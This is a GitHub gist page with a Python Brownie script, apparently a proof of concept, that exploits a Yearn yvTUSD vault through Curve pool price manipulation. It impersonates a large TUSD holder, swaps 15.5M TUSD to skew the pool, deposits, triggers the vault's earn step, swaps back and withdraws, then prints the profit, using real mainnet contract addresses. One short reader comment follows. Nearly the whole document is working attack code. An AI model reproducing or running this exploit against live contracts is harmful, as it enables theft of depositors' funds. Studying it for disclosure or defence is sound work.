-
-
Save banteg/b26ca556308b58d2643299dd02dbb54c to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from brownie import accounts, interface, Contract | |
def main(): | |
tusd = interface.ERC20('0x0000000000085d4780B73119b644AE5ecd22b376') | |
yvtusd = Contract('0x37d19d1c4E1fa9DC47bD1eA12f742a0887eDa74a') | |
curve = Contract('0x45F783CCE6B7FF23B2ab2D70e416cdb7D6055f51') | |
dai = interface.ERC20('0x6B175474E89094C44Da98b954EedeAC495271d0F') | |
# exploit parameters | |
swap_amt = Wei(15.5e24) # 15.5M TUSD | |
earn_amt = Wei(5.5e24) # 5.5M TUSD | |
# a user with tons of tusd (makerdao tusd join adapter) | |
hacker = accounts.at('0x4454aF7C8bb9463203b66C816220D41ED7837f44', force=True) | |
before = tusd.balanceOf(hacker).to('ether') | |
# give approvals | |
tusd.approve(curve, 2**256-1, {'from': hacker}) | |
tusd.approve(yvtusd, 2**256-1, {'from': hacker}) | |
dai.approve(curve, 2**256-1, {'from': hacker}) | |
# run the exploit | |
curve.exchange_underlying(3, 0, swap_amt, 0, {'from': hacker}) | |
yvtusd.deposit(earn_amt, {'from': hacker}) | |
yvtusd.earn({'from': hacker}) | |
curve.exchange_underlying(0, 3, dai.balanceOf(hacker), 0, {'from': hacker}) | |
yvtusd.withdrawAll({'from': hacker}) | |
after = tusd.balanceOf(hacker).to('ether') | |
print('profit', after - before) |
Author
banteg
commented
Oct 29, 2020
•
Is interface
your own custom solidity interface for wrapping ERC20?
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment